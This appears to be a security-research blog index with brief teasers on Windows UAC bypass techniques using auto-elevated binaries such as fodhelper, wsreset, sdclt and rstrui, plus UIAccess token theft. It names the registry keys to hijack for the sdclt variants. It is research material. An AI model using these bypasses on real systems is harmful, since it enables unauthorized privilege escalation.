RESEARCHING RSTRUI PROCESS

Rstrui is a signed Microsoft executable, which handles the system restore features. This executable has “autoElevate” property set to true in the manifest which means it will run with high integrity level. While playing around in ProcessMonitor from Sysinternals, I found out that rstrui.exe accepts command line arguments, I focused on the “/RUNONCE” argument.

Read More

UIACCESS UAC BYPASS

In these examples, we start a host process (msra.exe) that we steal the UIAccess token from. We downgrade the token IL from Medium+ to Medium. We use the token to spawn a new process (uihack.exe) with the UIAccess flag, we can now send keyboard events to the elevated processes.

Read More

FODHELPER UAC BYPASS

Fodhelper is a auto-elevated executable, which is signed by Microsoft. Fodhelper was introduced in Windows 10 (10240) to manage optional features, like keyboard settings.

Read More

WSRESET UAC BYPASS

WSReset is used to reset Windows Store settings. This executable is signed by Microsoft and has “autoElevate” property set to true in the manifest.

Read More

SDCLT UAC BYPASS (IsolatedCommand)

This executable is running elevated by default. Since sdclt executable is vulnerable to class hijacking, it can be used to spawn our executable with High IL. We need to hijack the IsolatedCommand value at “HKCU\Software\Classes\exefile\shell\runas\command” with full path to our executable.

Read More

SDCLT UAC BYPASS (App Paths)

This executable is running elevated by default. Since sdclt executable is vulnerable to registry App Path hijacking, it can be used to spawn our executable with High IL. We need to hijack the default value at “HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe” with full path to our executable.

Read More

SDCLT UAC BYPASS

Sdclt is a Microsoft executable file which was introduced in Windows 7 (7600) to allow users to perform backups or restore a backup. This executable is signed by Microsoft and has “autoElevate” property set to true in the manifest. You can verify the manifest using Sigcheck from Sysinternals.

Read More